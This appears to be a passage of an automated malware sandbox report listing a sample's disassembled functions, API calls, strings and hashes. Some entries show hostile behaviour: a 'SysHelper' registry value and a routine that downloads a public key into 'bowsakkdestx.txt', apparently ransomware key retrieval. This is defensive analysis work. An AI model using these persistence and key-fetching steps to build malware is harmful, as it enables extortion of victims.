                                                                                                                            • Instruction Fuzzy Hash: 69415B79BC834129F7655929BC03FC777815B50B1AF48886FFA88E92C3E688858741AD
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,?), ref: 0046C6C2
                                                                                                                            • RegQueryValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,?), ref: 0046C6F3
                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0046C700
                                                                                                                            • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 0046C725
                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0046C72E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseValue$OpenQuery
                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
                                                                                                                            • API String ID: 3962714758-1667468722
                                                                                                                            • Opcode ID: d935002d961569eaede09362cc8d224887099ea45f02de50f73a2653c1c6e0c9
                                                                                                                            • Instruction ID: 47a4b7530c2c47492d265e308e2820d872026311c0572f8f5994cf9781f23334
                                                                                                                            • Opcode Fuzzy Hash: d935002d961569eaede09362cc8d224887099ea45f02de50f73a2653c1c6e0c9
                                                                                                                            • Instruction Fuzzy Hash: 6E111E75940208FBDB209F90CC4AFEEBF78FF14705F104195EA00B2191E7B15A19AB55
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0047E707
                                                                                                                              • Part of subcall function 0046C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0046C51B
                                                                                                                            • InternetOpenW.WININET ref: 0047E743
                                                                                                                            • _wcsstr.LIBCMT ref: 0047E7AE
                                                                                                                            • _memmove.LIBCMT ref: 0047E838
                                                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 0047E90A
                                                                                                                            • lstrcatW.KERNEL32(?,&first=false), ref: 0047E93D
                                                                                                                            • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0047E954
                                                                                                                            • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0047E96F
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0047E98C
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0047E9A3
                                                                                                                            • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 0047E9CD
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0047E9F3
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0047E9F6
                                                                                                                            • _strstr.LIBCMT ref: 0047EA36
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0047EA59
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0047EA74
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0047EA82
                                                                                                                            • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 0047EA92
                                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 0047EAA4
                                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 0047EABA
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0047EAC8
                                                                                                                            • lstrlenA.KERNEL32(00000022), ref: 0047EAE3
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 0047EB5B
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0047EB7C
                                                                                                                            • _malloc.LIBCMT ref: 0047EB86
                                                                                                                            • _memset.LIBCMT ref: 0047EB94
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 0047EBAE
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 0047EBB6
                                                                                                                            • _strstr.LIBCMT ref: 0047EBDA
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0047EC00
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0047EC24
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0047EC32
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Path$Internetlstrcpylstrlen$Folder$AppendFile$CloseDeleteHandleOpen_memset_strstr$ByteCharMultiReadWide_malloc_memmove_wcsstrlstrcat
                                                                                                                            • String ID: bowsakkdestx.txt${"public_key":"
                                                                                                                            • API String ID: 2805819797-1771568745
                                                                                                                            • Opcode ID: 920ab47d1aa3f86d324baca30e2bf9adcbea66ea8b6ea5862a5b8517ffcdc499
                                                                                                                            • Instruction ID: 1c074ea7080a6dd3ca8b1fc97f1e384f3ed11f6aa9947bcdf21ffc5df3574b87
                                                                                                                            • Opcode Fuzzy Hash: 920ab47d1aa3f86d324baca30e2bf9adcbea66ea8b6ea5862a5b8517ffcdc499
                                                                                                                            • Instruction Fuzzy Hash: 02019230448381AAD630EF119C05BDF7B9CAF55708F04885EF98892182EB78920DC7AB
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: DecodePointer_write_multi_char$_write_string$__aulldvrm__cftof_free_strlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1678825546-0
                                                                                                                            • Opcode ID: 589e2253d7d99ae0dcbf429e34422fb1402ab038db5a2f2b80cba858938edee3
                                                                                                                            • Instruction ID: 424f548f24203fab9c79ab730cb735f55d216abbceed208e413a7de76b187101
                                                                                                                            • Opcode Fuzzy Hash: 589e2253d7d99ae0dcbf429e34422fb1402ab038db5a2f2b80cba858938edee3
                                                                                                                            • Instruction Fuzzy Hash: 6A71A771D092299BDF30AA58CCA8BAEB7B5EB54304F2444DAD908A7241D738DE80DF59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _write_multi_char$_write_string$__cftof_free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2964551433-0
                                                                                                                            • Opcode ID: a1f39ce8edf5d141bf583f0b5b0223a63800c28264195af6ae84c2876838b711
                                                                                                                            • Instruction ID: b037b8463d21f02b22fb37b15c6e84235a6df504623ee4d16f667c5135ca8794
                                                                                                                            • Opcode Fuzzy Hash: a1f39ce8edf5d141bf583f0b5b0223a63800c28264195af6ae84c2876838b711
                                                                                                                            • Instruction Fuzzy Hash: BF517471E09128AFDF20AA68CCA9BAE77B5FB04304F1404DAD908A6251E779DF80CF55
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _write_multi_char$_write_string$__cftof_free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2964551433-0
                                                                                                                            • Opcode ID: 9184f045ad01bb42410d4e7ab6faa150617f92114e0b0a62860346184688369c
                                                                                                                            • Instruction ID: f2fea00eac1435641bce71dc654833ca56eeda0a53e28c78687972c08c95003c
                                                                                                                            • Opcode Fuzzy Hash: 9184f045ad01bb42410d4e7ab6faa150617f92114e0b0a62860346184688369c
                                                                                                                            • Instruction Fuzzy Hash: 78516471D09129AEDF30AA68CCA9BAE77B5EB04304F1404DAD908A6251E739DF80CF54
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • ___unDName.LIBCMT ref: 0049071B
                                                                                                                            • _strlen.LIBCMT ref: 0049072E
                                                                                                                            • __lock.LIBCMT ref: 0049074A
                                                                                                                            • _malloc.LIBCMT ref: 0049075C
                                                                                                                            • _malloc.LIBCMT ref: 0049076D
                                                                                                                            • _free.LIBCMT ref: 004907B6
                                                                                                                              • Part of subcall function 004842FD: IsProcessorFeaturePresent.KERNEL32(00000017,004842D1,i;H,?,?,00480CE9,0048520D,?,004842DE,00000000,00000000,00000000,00000000,00000000,0048981C), ref: 004842FF
                                                                                                                            • _free.LIBCMT ref: 004907AF
                                                                                                                              • Part of subcall function 00480BED: HeapFree.KERNEL32(00000000,00000000,?,0048507F,00000000,0048520D,00480CE9), ref: 00480C01
                                                                                                                              • Part of subcall function 00480BED: GetLastError.KERNEL32(00000000,?,0048507F,00000000,0048520D,00480CE9), ref: 00480C13
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _free_malloc$ErrorFeatureFreeHeapLastNamePresentProcessor___un__lock_strlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3704956918-0
                                                                                                                            • Opcode ID: 7b83b0165dbd2c684cbaf2ed116174c1eca8af89e51e4b29addd0f5af4d74c31
                                                                                                                            • Instruction ID: f8c217dc36b2cfd9760ea6a82f589ac5a95e45c3b8fa34eaeac99f1b81511e75
                                                                                                                            • Opcode Fuzzy Hash: 7b83b0165dbd2c684cbaf2ed116174c1eca8af89e51e4b29addd0f5af4d74c31
                                                                                                                            • Instruction Fuzzy Hash: A521A971914705AEDB65BBB58845B1FBB94AF04724F50857FF4189B282DB7CE800CB98
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • timeGetTime.WINMM ref: 00471B1E
                                                                                                                            • timeGetTime.WINMM ref: 00471B29
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00471B4C
                                                                                                                            • DispatchMessageW.USER32(?), ref: 00471B5C
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00471B6A
                                                                                                                            • Sleep.KERNEL32(00000064), ref: 00471B72
                                                                                                                            • timeGetTime.WINMM ref: 00471B78
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageTimetime$Peek$DispatchSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3697694649-0
                                                                                                                            • Opcode ID: 201cb8417f29f97518eb8715fa11cd0b52ac85b920dbc2a61c21f35a4a8d9be7
                                                                                                                            • Instruction ID: e22111e1a8fc4ac874f932cd817cc5f8ff663f5d2b10c1ffdd4ba5ed3842f039
                                                                                                                            • Opcode Fuzzy Hash: 201cb8417f29f97518eb8715fa11cd0b52ac85b920dbc2a61c21f35a4a8d9be7
                                                                                                                            • Instruction Fuzzy Hash: 3A018832A40319A6DB20D7E99C45FEEB76CBF18B40F044466F704B7191E674B905CBE9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • __init_pointers.LIBCMT ref: 00485141
                                                                                                                              • Part of subcall function 00487D6C: EncodePointer.KERNEL32(00000000,?,00485146,00483FFE,00567990,00000014), ref: 00487D6F
                                                                                                                              • Part of subcall function 00487D6C: __initp_misc_winsig.LIBCMT ref: 00487D8A
                                                                                                                              • Part of subcall function 00487D6C: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004926B3
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004926C7
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004926DA
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004926ED
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00492700
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00492713
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00492726
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00492739
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0049274C
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0049275F
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00492772
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00492785
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00492798
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 004927AB
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 004927BE
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 004927D1
                                                                                                                            • __mtinitlocks.LIBCMT ref: 00485146
                                                                                                                            • __mtterm.LIBCMT ref: 0048514F
                                                                                                                              • Part of subcall function 004851B7: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00485154,00483FFE,00567990,00000014), ref: 00488B62
                                                                                                                              • Part of subcall function 004851B7: _free.LIBCMT ref: 00488B69
                                                                                                                              • Part of subcall function 004851B7: DeleteCriticalSection.KERNEL32(0056AC00,?,?,00485154,00483FFE,00567990,00000014), ref: 00488B8B
                                                                                                                            • __calloc_crt.LIBCMT ref: 00485174
                                                                                                                            • __initptd.LIBCMT ref: 00485196
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0048519D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3567560977-0
                                                                                                                            • Opcode ID: 5170af13b35bfc47d9f46adbe0a5babc83d15f2cf932023ea3d694e95a477813
                                                                                                                            • Instruction ID: 84dca69921717a3d6c4d4ed2404dfee7e71615566e5f58d2805b14def0d132e2
                                                                                                                            • Opcode Fuzzy Hash: 5170af13b35bfc47d9f46adbe0a5babc83d15f2cf932023ea3d694e95a477813
                                                                                                                            • Instruction Fuzzy Hash: 4BF0C232949A112DE6353A7A6C07B4F2A809F01738B210E1FF064D52D5EF5894415799
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • __lock.LIBCMT ref: 0048594A
                                                                                                                              • Part of subcall function 00488AF7: __mtinitlocknum.LIBCMT ref: 00488B09
                                                                                                                              • Part of subcall function 00488AF7: __amsg_exit.LIBCMT ref: 00488B15
                                                                                                                              • Part of subcall function 00488AF7: EnterCriticalSection.KERNEL32(i;H,?,004850D7,0000000D), ref: 00488B22
                                                                                                                            • _free.LIBCMT ref: 00485970
                                                                                                                              • Part of subcall function 00480BED: HeapFree.KERNEL32(00000000,00000000,?,0048507F,00000000,0048520D,00480CE9), ref: 00480C01
                                                                                                                              • Part of subcall function 00480BED: GetLastError.KERNEL32(00000000,?,0048507F,00000000,0048520D,00480CE9), ref: 00480C13
                                                                                                                            • __lock.LIBCMT ref: 00485989
                                                                                                                            • ___removelocaleref.LIBCMT ref: 00485998
                                                                                                                            • ___freetlocinfo.LIBCMT ref: 004859B1
                                                                                                                            • _free.LIBCMT ref: 004859C4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 626533743-0
                                                                                                                            • Opcode ID: def75f6cb6d0d672af9e4d6134873646e57e7698413cfa20c796f933f604dfc0
                                                                                                                            • Instruction ID: ca6944bc949019f202863d08ba26eb14c31e2e8531f725297b27a775bf5e9a09
                                                                                                                            • Opcode Fuzzy Hash: def75f6cb6d0d672af9e4d6134873646e57e7698413cfa20c796f933f604dfc0
                                                                                                                            • Instruction Fuzzy Hash: 0E015BB1502B00E6DA34BBA9D846B1E72A06F00739F604E5FE4646A2D5CFBC9980DB5D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __aulldvrm
                                                                                                                            • String ID: $+$0123456789ABCDEF$UlK
                                                                                                                            • API String ID: 1302938615-392471189
                                                                                                                            • Opcode ID: e59e0865a7e7feb91efd8b9ec14c9ffceac109d8c26e1e14746f299abae5350b
                                                                                                                            • Instruction ID: 5d79033a0d1641cee28c1ec0bcd5030b108edf4232128083af2b5817aebdf2d9
                                                                                                                            • Opcode Fuzzy Hash: e59e0865a7e7feb91efd8b9ec14c9ffceac109d8c26e1e14746f299abae5350b
                                                                                                                            • Instruction Fuzzy Hash: 74818DB1A087509FD720CF298840A6BBBE5BFC8754F15091EF989A3352D338DD058BA6
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 004B07C3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ___from_strstr_to_strchr
                                                                                                                            • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                                                                                                                            • API String ID: 601868998-2416195885
                                                                                                                            • Opcode ID: d253b54df10fdedd9026f4ed7fc5f906658a5d3edb13d4881b46fbc6cab53c8e
                                                                                                                            • Instruction ID: 8a5badbd6d10ce0d3b27618c4de3becb9d81d01ee054be2f893b7bfdee36208f
                                                                                                                            • Opcode Fuzzy Hash: d253b54df10fdedd9026f4ed7fc5f906658a5d3edb13d4881b46fbc6cab53c8e
                                                                                                                            • Instruction Fuzzy Hash: 3641E771A043059BDB24EE15CC45BEFB7D8EF85349F00082FF58593241EA79E9098BB6
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset
                                                                                                                            • String ID: .\crypto\buffer\buffer.c$g9L
                                                                                                                            • API String ID: 2102423945-957670896
                                                                                                                            • Opcode ID: 17f1ebc54ed39b968f6035c0df2cf15f5b91dbb67fd3db8f6bda8d49f181cf43
                                                                                                                            • Instruction ID: 7dc351e9e75f57ed17621435b292e6d8d9c7ecc1bf5e76977484c5a99075eabc
                                                                                                                            • Opcode Fuzzy Hash: 17f1ebc54ed39b968f6035c0df2cf15f5b91dbb67fd3db8f6bda8d49f181cf43
                                                                                                                            • Instruction Fuzzy Hash: 352106B6B403213FE214665DFC42B96B399EB84B18F10442AF208D72C2D374E821C3E9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • __getptd_noexit.LIBCMT ref: 00525D3D
                                                                                                                              • Part of subcall function 0048501F: GetLastError.KERNEL32(?,i;H,0048520D,00480CE9,?,?,00483B69,?), ref: 00485021
                                                                                                                              • Part of subcall function 0048501F: __calloc_crt.LIBCMT ref: 00485042
                                                                                                                              • Part of subcall function 0048501F: __initptd.LIBCMT ref: 00485064
                                                                                                                              • Part of subcall function 0048501F: GetCurrentThreadId.KERNEL32 ref: 0048506B
                                                                                                                              • Part of subcall function 0048501F: SetLastError.KERNEL32(00000000,i;H,0048520D,00480CE9,?,?,00483B69,?), ref: 00485083
                                                                                                                            • __calloc_crt.LIBCMT ref: 00525D60
                                                                                                                            • __get_sys_err_msg.LIBCMT ref: 00525D7E
                                                                                                                            • __get_sys_err_msg.LIBCMT ref: 00525DCD
                                                                                                                            Strings
                                                                                                                            • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 00525D48, 00525D6E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmp
